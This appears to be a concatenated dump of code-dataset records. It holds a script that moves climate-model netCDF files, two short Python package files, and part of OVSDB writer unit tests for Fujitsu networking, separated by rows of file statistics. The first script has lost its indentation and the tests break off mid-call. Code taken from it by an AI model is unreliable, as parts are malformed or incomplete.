'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770201-19770228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770301-19770331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770401-19770430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770501-19770531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770601-19770630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770701-19770731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770801-19770831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770901-19770930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771001-19771031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771101-19771130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771201-19771231.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197612312359.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197712312359.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19740131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740201-19740228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740301-19740331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740401-19740430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740501-19740531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740601-19740630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740701-19740731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740801-19740831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740901-19740930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741001-19741031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741101-19741130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741201-19741231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19750131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750201-19750228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750301-19750331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750401-19750430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750501-19750531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750601-19750630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750701-19750731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750801-19750831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750901-19750930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751001-19751031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751101-19751130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751201-19751231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19740131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740201-19740228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740301-19740331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740401-19740430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740501-19740531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740601-19740630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740701-19740731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740801-19740831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740901-19740930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741001-19741031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741101-19741130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741201-19741231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19750131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750201-19750228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750301-19750331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750401-19750430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19790131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750501-19750531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750601-19750630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750701-19750731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750801-19750831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750901-19750930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751001-19751031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751101-19751130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19780131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751201-19751231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780201-19780228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780301-19780331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780401-19780430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780501-19780531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780601-19780630.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197412312359.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780701-19780731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780801-19780831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780901-19780930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781001-19781031.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197512312359.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781101-19781130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781201-19781231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790201-19790228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790301-19790331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790401-19790430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790501-19790531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790601-19790630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790701-19790731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790801-19790831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790901-19790930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791001-19791031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791101-19791130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791201-19791231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19780131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780201-19780228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780301-19780331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780401-19780430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780501-19780531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780601-19780630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780701-19780731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780801-19780831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780901-19780930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781001-19781031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781101-19781130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781201-19781231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19790131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790201-19790228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790301-19790331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790401-19790430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790501-19790531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790601-19790630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790701-19790731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790801-19790831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790901-19790930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791001-19791031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791101-19791130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791201-19791231.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197812312359.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197912312359.nc',
]
# we are expecting to move 1131 files so check that they're all there
if len(files_to_move) != 1131:
logger.error('There are not 1131 files listed here.')
sys.exit(1)
for partial_path in files_to_move:
src_path = os.path.join(base_input_dir, partial_path)
try:
shutil.move(src_path, dest_dir)
except Exception:
logger.error('Unable to move file {}'.format(src_path))
raise
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
if cmd_args.log_level:
try:
log_level = getattr(logging, cmd_args.log_level.upper())
except AttributeError:
logger.setLevel(logging.WARNING)
logger.error('log-level must be one of: debug, info, warn or error')
sys.exit(1)
else:
log_level = DEFAULT_LOG_LEVEL
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': DEFAULT_LOG_FORMAT,
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
| 92.483743
| 107
| 0.87974
| 17,450
| 116,622
| 5.421032
| 0.041891
| 0.083988
| 0.095986
| 0.119983
| 0.977853
| 0.976564
| 0.976564
| 0.976564
| 0.975982
| 0.975528
| 0
| 0.389768
| 0.01937
| 116,622
| 1,260
| 108
| 92.557143
| 0.437397
| 0.012939
| 0
| 0.005
| 0
| 0
| 0.945476
| 0.942078
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001667
| false
| 0
| 0.004167
| 0
| 0.006667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8b0aa768429678c325e3c7cb6be22acfc7275186
| 273
|
py
|
Python
|
swtstore/classes/exceptions.py
|
janastu/swtstore
|
7326138bf2fbf2a4ed8c7300c68092f91709dfc2
|
[
"BSD-2-Clause"
] | 2
|
2015-04-28T00:35:21.000Z
|
2016-02-11T19:31:15.000Z
|
swtstore/classes/exceptions.py
|
janastu/swtstore
|
7326138bf2fbf2a4ed8c7300c68092f91709dfc2
|
[
"BSD-2-Clause"
] | 9
|
2015-02-02T11:24:23.000Z
|
2017-12-29T07:49:07.000Z
|
swtstore/classes/exceptions.py
|
janastu/swtstore
|
7326138bf2fbf2a4ed8c7300c68092f91709dfc2
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding utf-8 -*-
# classes/exceptions.py
from sqlalchemy.exc import DontWrapMixin
class AlreadyExistsError(Exception, DontWrapMixin):
pass
class InvalidPayload(Exception, DontWrapMixin):
pass
class ContextDoNotExist(Exception, DontWrapMixin):
pass
| 16.058824
| 51
| 0.758242
| 26
| 273
| 7.961538
| 0.653846
| 0.318841
| 0.376812
| 0.299517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004329
| 0.153846
| 273
| 16
| 52
| 17.0625
| 0.891775
| 0.153846
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.428571
| 0.142857
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
8c7f2be28de2050145234c94a56c3b0d55018345
| 218
|
py
|
Python
|
deepy/data/__init__.py
|
popura/deepy-pytorch
|
71d87a82e937d82b9b149041280a392cc24b7299
|
[
"MIT"
] | 1
|
2021-07-19T09:38:26.000Z
|
2021-07-19T09:38:26.000Z
|
deepy/data/__init__.py
|
popura/deepy-pytorch
|
71d87a82e937d82b9b149041280a392cc24b7299
|
[
"MIT"
] | 1
|
2021-07-26T06:47:45.000Z
|
2021-07-26T06:47:45.000Z
|
deepy/data/__init__.py
|
popura/deepy-pytorch
|
71d87a82e937d82b9b149041280a392cc24b7299
|
[
"MIT"
] | null | null | null |
import deepy.data.dataset
import deepy.data.transform
from deepy.data.dataset import SelfSupervisedDataset
from deepy.data.dataset import InverseDataset
from deepy.data.toydataset import ToyClassDataset, ToyRegDataset
| 36.333333
| 64
| 0.87156
| 27
| 218
| 7.037037
| 0.407407
| 0.236842
| 0.252632
| 0.347368
| 0.273684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077982
| 218
| 6
| 64
| 36.333333
| 0.945274
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8c84e2d5d860879138b737bfd3b223e741509f84
| 37,299
|
py
|
Python
|
networking_fujitsu/tests/unit/ml2/common/ovsdb/test_ovsdb_writer.py
|
mail2nsrajesh/networking-fujitsu
|
e3a5205999cb36f7d1ead3698ce7465c0a08eb2a
|
[
"Apache-2.0"
] | null | null | null |
networking_fujitsu/tests/unit/ml2/common/ovsdb/test_ovsdb_writer.py
|
mail2nsrajesh/networking-fujitsu
|
e3a5205999cb36f7d1ead3698ce7465c0a08eb2a
|
[
"Apache-2.0"
] | null | null | null |
networking_fujitsu/tests/unit/ml2/common/ovsdb/test_ovsdb_writer.py
|
mail2nsrajesh/networking-fujitsu
|
e3a5205999cb36f7d1ead3698ce7465c0a08eb2a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import mock
import random
import socket
from oslo_log import log as logging
from oslo_serialization import jsonutils
from networking_fujitsu.ml2.common.ovsdb import base_connection
from networking_fujitsu.ml2.common.ovsdb import constants as n_const
from networking_fujitsu.ml2.common.ovsdb import ovsdb_writer
from networking_fujitsu.tests.unit.ml2.common.ovsdb import (
test_base_connection as base_test)
from neutron.tests import base
LOG = logging.getLogger(__name__)
class TestOVSDBWriter(base.BaseTestCase):
def setUp(self):
super(TestOVSDBWriter, self).setUp()
self.op_id = 'abcd'
self.ovsdb_ip = "1.1.1.1"
self.ovsdb_port = 6640
self.sock = mock.patch('socket.socket').start()
self.fake_ovsdb = ovsdb_writer.OVSDBWriter(self.ovsdb_ip,
self.ovsdb_port)
self.fake_message = {'id': self.op_id,
'fake_key': 'fake_value'}
self.fake_ipaddrs = ["fake_ipaddr1", "fake_ipaddr2"]
self.fake_ovsdb.responses = [self.fake_message]
def test_process_response(self):
"""Test case to test _process_response."""
expected_result = {'fake_key': 'fake_value'}
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_response',
return_value={'fake_key': 'fake_value'}
) as resp:
result = self.fake_ovsdb._process_response(self.op_id)
self.assertEqual(result, expected_result)
resp.assert_called_with(self.op_id)
def test_process_response_with_error(self):
"""Test case to test _process_response with error."""
foo_dict = {'fake_key': 'fake_value',
'error': 'fake_error'}
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_response',
return_value=foo_dict) as resp:
self.assertRaises(base_connection.OVSDBError,
self.fake_ovsdb._process_response,
self.op_id)
resp.assert_called_with(self.op_id)
def test_process_response_with_error1(self):
"""Test case to test _process_response with errors in the
subqueries.
"""
fake_dict = {'id': '295366252499790541931626006259650283530',
'result':
[{'uuid':
['uuid', 'be236bbf-8f83-4bf0-816b-629c7e5b5609'
]},
{},
{'error': 'referential integrity violation',
'details': 'Table Ucast_Macs_Remote column '
'locator row '
'be236bbf-8f83-4bf0-816b-629c7e5b5609 '
'references nonexistent row '
'1b143819-45a6-44ec-826a-ac75243a07ce in '
'table Physical_Locator.'
}],
'error': None}
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_response',
return_value=fake_dict) as resp:
self.assertRaises(base_connection.OVSDBError,
self.fake_ovsdb._process_response,
self.op_id)
resp.assert_called_with(self.op_id)
def test_send_and_receive(self):
"""Test case to test _send_and_receive."""
with mock.patch.object(base_connection.BaseConnection,
'send', return_value=True
) as mock_send:
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_get_reply') as mock_reply:
self.fake_ovsdb._send_and_receive('some_query',
self.op_id, True)
mock_send.assert_called_with('some_query')
mock_reply.assert_called_with(self.op_id)
def test_send_and_receive_with_rcv_required_false(self):
"""Test case to test _send_and_receive."""
with mock.patch.object(base_connection.BaseConnection,
'send', return_value=True
) as mock_send:
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_get_reply') as mock_reply:
self.fake_ovsdb._send_and_receive('some_query',
self.op_id, False)
mock_send.assert_called_with('some_query')
mock_reply.assert_not_called()
def test_get_reply(self):
"""Test case to test _get_reply."""
ret_value = jsonutils.dumps({self.op_id:
'foo_value'})
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=jsonutils.dumps({
self.op_id: 'foo_value'})) as recv_data, \
mock.patch.object(ovsdb_writer.OVSDBWriter, '_process_response',
return_value=(ret_value, None)) as proc_response, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb._get_reply(self.op_id)
self.assertTrue(recv_data.called)
self.assertTrue(proc_response.called)
def test_get_reply_exception(self):
"""Test case to test _get_reply.
However, something unknow exception occuered when getting response.
"""
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=jsonutils.dumps({
self.op_id: 'foo_value'})), \
mock.patch.object(ovsdb_writer.OVSDBWriter, '_process_response',
return_value=''), \
mock.patch.object(ast, 'literal_eval', side_effect=RuntimeError), \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.assertRaises(RuntimeError,
self.fake_ovsdb._get_reply,
self.op_id)
def test_get_reply_max_retried(self):
"""Test case to test _get_reply when MAX_RETRIES has been tried."""
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=''), \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.assertRaises(RuntimeError,
self.fake_ovsdb._get_reply,
self.op_id)
def test_recv_data(self):
"""Test case to test _recv_data with a valid data."""
n_const.BUFFER_SIZE = 5
fake_data_raw = '{"fake_key": "fake_value"}'
fake_socket = base_test.SocketClass(None,
None,
None,
fake_data_raw)
with mock.patch.object(socket, 'socket', return_value=fake_socket):
fake_obj = ovsdb_writer.OVSDBWriter(
self.ovsdb_ip, self.ovsdb_port)
result = fake_obj._recv_data()
self.assertEqual(fake_data_raw, result)
def test_recv_data_with_empty_data(self):
"""Test case to test _recv_data with empty data."""
fake_socket = base_test.SocketClass(None,
None,
None,
'')
with mock.patch.object(socket, 'socket',
return_value=fake_socket):
with mock.patch.object(ovsdb_writer.LOG, 'warning'):
fake_obj = ovsdb_writer.OVSDBWriter(
self.ovsdb_ip, self.ovsdb_port)
result = fake_obj._recv_data()
self.assertIsNone(result)
def test_recv_data_with_socket_error(self):
"""Test case to test _recv_data with socket error."""
fake_socket = base_test.SocketClass(None,
None,
socket.error)
with mock.patch.object(socket, 'socket', return_value=fake_socket):
with mock.patch.object(ovsdb_writer.LOG,
'warning') as fake_warn:
fake_obj = ovsdb_writer.OVSDBWriter(
self.ovsdb_ip, self.ovsdb_port)
result = fake_obj._recv_data()
self.assertIsNone(result)
fake_warn.assert_called_with("Did not receive any reply from "
"the OVSDB server")
def test_get_sw_ep_info(self):
"""Test case to test get_sw_ep_info."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Physical_Switch',
'where': [],
'columns': ['tunnel_ips', 'name']}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"name":' \
'"fake_host_name","tunnel_ips":' \
'"fake_endpoint_ip"}]}],"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = ('fake_endpoint_ip', 'fake_host_name')
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_sw_ep_info()
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_insert_logical_switch(self):
"""Test case to test insert_logical_switch."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Logical_Switch',
'row': {'name': 'fake_logical_switch_name',
'tunnel_key': 'fake_tunnel_key'}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_logical_switch(
'fake_tunnel_key', 'fake_logical_switch_name', mock.ANY)
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_logical_switch_uuid(self):
"""Test case to test get_logical_switch_uuid."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Logical_Switch',
'where': [['name', '==',
'fake_logical_switch_name']]}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"_version":' \
'["uuid","abcd"],"name":' \
'"fake_logical_switch_name",' \
'"description":"","tunnel_key":1,"_uuid":["uuid",' \
'"fake_logical_switch_uuid"]}]}],"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = 'fake_logical_switch_uuid'
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_logical_switch_uuid(
'fake_logical_switch_name')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_delete_logical_switch(self):
"""Test case to test delete_logical_switch."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'delete',
'table': 'Mcast_Macs_Local',
'where': [['logical_switch', '==',
['uuid', 'fake_ls_uuid']]]},
{'op': 'delete',
'table': 'Logical_Switch',
'where': [['_uuid', '==',
['uuid', 'fake_ls_uuid']]]},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.delete_logical_switch(
